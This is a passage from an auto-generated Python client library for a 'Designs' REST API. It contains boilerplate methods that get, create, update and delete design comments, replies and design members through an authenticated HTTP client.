asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_comments_nk_replies_get_with_http_info(id, nk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str nk: Foreign key for comments. (required)
:param str filter:
:return: list[DesignComment]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'nk', 'filter']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method designs_id_comments_nk_replies_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `designs_id_comments_nk_replies_get`")
# verify the required parameter 'nk' is set
if ('nk' not in params) or (params['nk'] is None):
raise ValueError("Missing the required parameter `nk` when calling `designs_id_comments_nk_replies_get`")
collection_formats = {}
resource_path = '/Designs/{id}/comments/{nk}/replies'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
if 'nk' in params:
path_params['nk'] = params['nk']
query_params = {}
if 'filter' in params:
query_params['filter'] = params['filter']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[DesignComment]',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def designs_id_comments_nk_replies_post(self, id, nk, **kwargs):
"""
Creates a new instance in replies of this model.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_comments_nk_replies_post(id, nk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str nk: Foreign key for comments. (required)
:param DesignComment data:
:return: DesignComment
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.designs_id_comments_nk_replies_post_with_http_info(id, nk, **kwargs)
else:
(data) = self.designs_id_comments_nk_replies_post_with_http_info(id, nk, **kwargs)
return data
def designs_id_comments_nk_replies_post_with_http_info(self, id, nk, **kwargs):
"""
Creates a new instance in replies of this model.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_comments_nk_replies_post_with_http_info(id, nk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str nk: Foreign key for comments. (required)
:param DesignComment data:
:return: DesignComment
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'nk', 'data']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method designs_id_comments_nk_replies_post" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `designs_id_comments_nk_replies_post`")
# verify the required parameter 'nk' is set
if ('nk' not in params) or (params['nk'] is None):
raise ValueError("Missing the required parameter `nk` when calling `designs_id_comments_nk_replies_post`")
collection_formats = {}
resource_path = '/Designs/{id}/comments/{nk}/replies'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
if 'nk' in params:
path_params['nk'] = params['nk']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'data' in params:
body_params = params['data']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DesignComment',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def designs_id_comments_nk_reply_of_get(self, id, nk, **kwargs):
"""
Fetches belongsTo relation replyOf.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_comments_nk_reply_of_get(id, nk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str nk: Foreign key for comments. (required)
:param bool refresh:
:return: DesignComment
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.designs_id_comments_nk_reply_of_get_with_http_info(id, nk, **kwargs)
else:
(data) = self.designs_id_comments_nk_reply_of_get_with_http_info(id, nk, **kwargs)
return data
def designs_id_comments_nk_reply_of_get_with_http_info(self, id, nk, **kwargs):
"""
Fetches belongsTo relation replyOf.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_comments_nk_reply_of_get_with_http_info(id, nk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str nk: Foreign key for comments. (required)
:param bool refresh:
:return: DesignComment
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'nk', 'refresh']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method designs_id_comments_nk_reply_of_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `designs_id_comments_nk_reply_of_get`")
# verify the required parameter 'nk' is set
if ('nk' not in params) or (params['nk'] is None):
raise ValueError("Missing the required parameter `nk` when calling `designs_id_comments_nk_reply_of_get`")
collection_formats = {}
resource_path = '/Designs/{id}/comments/{nk}/replyOf'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
if 'nk' in params:
path_params['nk'] = params['nk']
query_params = {}
if 'refresh' in params:
query_params['refresh'] = params['refresh']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DesignComment',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def designs_id_comments_post(self, id, **kwargs):
"""
Creates a new instance in comments of this model.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_comments_post(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param DesignComment data:
:return: DesignComment
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.designs_id_comments_post_with_http_info(id, **kwargs)
else:
(data) = self.designs_id_comments_post_with_http_info(id, **kwargs)
return data
def designs_id_comments_post_with_http_info(self, id, **kwargs):
"""
Creates a new instance in comments of this model.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_comments_post_with_http_info(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param DesignComment data:
:return: DesignComment
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'data']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method designs_id_comments_post" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `designs_id_comments_post`")
collection_formats = {}
resource_path = '/Designs/{id}/comments'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'data' in params:
body_params = params['data']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DesignComment',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def designs_id_delete(self, id, **kwargs):
"""
Delete a model instance by {{id}} from the data source.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_delete(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Model id (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.designs_id_delete_with_http_info(id, **kwargs)
else:
(data) = self.designs_id_delete_with_http_info(id, **kwargs)
return data
def designs_id_delete_with_http_info(self, id, **kwargs):
"""
Delete a model instance by {{id}} from the data source.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_delete_with_http_info(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Model id (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method designs_id_delete" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `designs_id_delete`")
collection_formats = {}
resource_path = '/Designs/{id}'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def designs_id_design_members_count_get(self, id, **kwargs):
"""
Counts designMembers of Design.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_design_members_count_get(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str where: Criteria to match model instances
:return: InlineResponse2001
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.designs_id_design_members_count_get_with_http_info(id, **kwargs)
else:
(data) = self.designs_id_design_members_count_get_with_http_info(id, **kwargs)
return data
def designs_id_design_members_count_get_with_http_info(self, id, **kwargs):
"""
Counts designMembers of Design.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_design_members_count_get_with_http_info(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str where: Criteria to match model instances
:return: InlineResponse2001
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'where']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method designs_id_design_members_count_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `designs_id_design_members_count_get`")
collection_formats = {}
resource_path = '/Designs/{id}/designMembers/count'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
if 'where' in params:
query_params['where'] = params['where']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='InlineResponse2001',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def designs_id_design_members_delete(self, id, **kwargs):
"""
Deletes all designMembers of this model.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_design_members_delete(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.designs_id_design_members_delete_with_http_info(id, **kwargs)
else:
(data) = self.designs_id_design_members_delete_with_http_info(id, **kwargs)
return data
def designs_id_design_members_delete_with_http_info(self, id, **kwargs):
"""
Deletes all designMembers of this model.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_design_members_delete_with_http_info(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method designs_id_design_members_delete" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `designs_id_design_members_delete`")
collection_formats = {}
resource_path = '/Designs/{id}/designMembers'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def designs_id_design_members_fk_delete(self, id, fk, **kwargs):
"""
Delete a related item by id for designMembers.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_design_members_fk_delete(id, fk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str fk: Foreign key for designMembers (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.designs_id_design_members_fk_delete_with_http_info(id, fk, **kwargs)
else:
(data) = self.designs_id_design_members_fk_delete_with_http_info(id, fk, **kwargs)
return data
def designs_id_design_members_fk_delete_with_http_info(self, id, fk, **kwargs):
"""
Delete a related item by id for designMembers.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_design_members_fk_delete_with_http_info(id, fk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str fk: Foreign key for designMembers (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'fk']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method designs_id_design_members_fk_delete" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `designs_id_design_members_fk_delete`")
# verify the required parameter 'fk' is set
if ('fk' not in params) or (params['fk'] is None):
raise ValueError("Missing the required parameter `fk` when calling `designs_id_design_members_fk_delete`")
collection_formats = {}
resource_path = '/Designs/{id}/designMembers/{fk}'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
if 'fk' in params:
path_params['fk'] = params['fk']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def designs_id_design_members_fk_get(self, id, fk, **kwargs):
"""
Find a related item by id for designMembers.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_design_members_fk_get(id, fk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str fk: Foreign key for designMembers (required)
:return: DesignMember
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.designs_id_design_members_fk_get_with_http_info(id, fk, **kwargs)
else:
(data) = self.designs_id_design_members_fk_get_with_http_info(id, fk, **kwargs)
return data
def designs_id_design_members_fk_get_with_http_info(self, id, fk, **kwargs):
"""
Find a related item by id for designMembers.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_design_members_fk_get_with_http_info(id, fk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str fk: Foreign key for designMembers (required)
:return: DesignMember
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'fk']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method designs_id_design_members_fk_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `designs_id_design_members_fk_get`")
# verify the required parameter 'fk' is set
if ('fk' not in params) or (params['fk'] is None):
raise ValueError("Missing the required parameter `fk` when calling `designs_id_design_members_fk_get`")
collection_formats = {}
resource_path = '/Designs/{id}/designMembers/{fk}'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
if 'fk' in params:
path_params['fk'] = params['fk']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DesignMember',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def designs_id_design_members_fk_put(self, id, fk, **kwargs):
"""
Update a related item by id for designMembers.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_design_members_fk_put(id, fk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str fk: Foreign key for designMembers (required)
:param DesignMember data:
:return: DesignMember
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.designs_id_design_members_fk_put_with_http_info(id, fk, **kwargs)
else:
(data) = self.designs_id_design_members_fk_put_with_http_info(id, fk, **kwargs)
return data
def designs_id_design_members_fk_put_with_http_info(self, id, fk, **kwargs):
"""
Update a related item by id for designMembers.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_design_members_fk_put_with_http_info(id, fk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str fk: Foreign key for designMembers (required)
:param DesignMember data:
:return: DesignMember
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'fk', 'data']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method designs_id_design_members_fk_put" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `designs_id_design_members_fk_put`")
# verify the required parameter 'fk' is set
if ('fk' not in params) or (params['fk'] is None):
raise ValueError("Missing the required parameter `fk` when calling `designs_id_design_members_fk_put`")
collection_formats = {}
resource_path = '/Designs/{id}/designMembers/{fk}'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
if 'fk' in params:
path_params['fk'] = params['fk']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'data' in params:
body_params = params['data']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DesignMember',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def designs_id_design_members_get(self, id, **kwargs):
"""
Queries designMembers of Design.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_design_members_get(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str filter:
:return: list[DesignMember]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.designs_id_design_members_get_with_http_info(id, **kwargs)
else:
(data) = self.designs_id_design_members_get_with_http_info(id, **kwargs)
return data
def designs_id_design_members_get_with_http_info(self, id, **kwargs):
"""
Queries designMembers of Design.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_design_members_get_with_http_info(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str filter:
:return: list[DesignMember]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'filter']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method designs_id_design_members_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `designs_id_design_members_get`")
collection_formats = {}
resource_path = '/Designs/{id}/designMembers'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
if 'filter' in params:
query_params['filter'] = params['filter']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[DesignMember]',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def designs_id_design_members_post(self, id, **kwargs):
"""
Creates a new instance in designMembers of this model.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_design_members_post(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param DesignMember data:
:return: DesignMember
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.designs_id_design_members_post_with_http_info(id, **kwargs)
else:
(data) = self.designs_id_design_members_post_with_http_info(id, **kwargs)
return data
def designs_id_design_members_post_with_http_info(self, id, **kwargs):
"""
Creates a new instance in designMembers of this model.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_design_members_post_with_http_info(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param DesignMember data:
:return: DesignMember
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'data']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method designs_id_design_members_post" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `designs_id_design_members_post`")
collection_formats = {}
resource_path = '/Designs/{id}/designMembers'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
header_params = {}
